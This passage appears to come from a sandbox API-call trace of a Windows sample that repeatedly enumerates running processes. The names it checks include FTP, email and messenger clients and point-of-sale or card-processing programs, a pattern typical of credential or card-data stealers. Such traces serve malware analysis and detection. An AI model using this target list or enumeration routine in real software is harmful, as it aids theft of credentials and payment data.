th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0224.655] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0224.657] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0224.659] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0224.661] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0224.663] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0224.665] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0224.666] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0224.716] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0224.718] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0224.720] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0224.721] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0224.723] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0224.725] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0224.726] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0224.728] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0224.730] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0224.732] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0224.734] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0224.735] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0224.737] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0224.740] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0224.742] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0224.745] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0224.746] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0224.748] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0224.750] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0224.751] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0224.753] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0224.754] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0224.756] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0224.757] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0224.759] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0224.782] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0224.784] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0224.785] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0224.787] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0224.788] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0224.790] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0224.791] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0224.793] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0224.794] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0224.796] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.797] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.798] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.800] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0224.801] CloseHandle (hObject=0x2278) returned 1 [0224.801] Sleep (dwMilliseconds=0x64) [0224.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0224.943] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.944] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.946] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.947] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.948] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.950] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.951] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.952] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.954] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.955] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.956] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.958] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.959] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.960] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.962] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.963] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.966] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.967] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.968] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.970] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.971] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0224.972] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0224.974] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.975] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.976] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.978] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0224.983] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0224.985] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0224.986] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.988] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.989] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.990] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.992] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.993] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0224.994] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0224.996] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0224.997] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0224.998] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0225.000] Process32Next (in: hSnapshot=0xdc4, 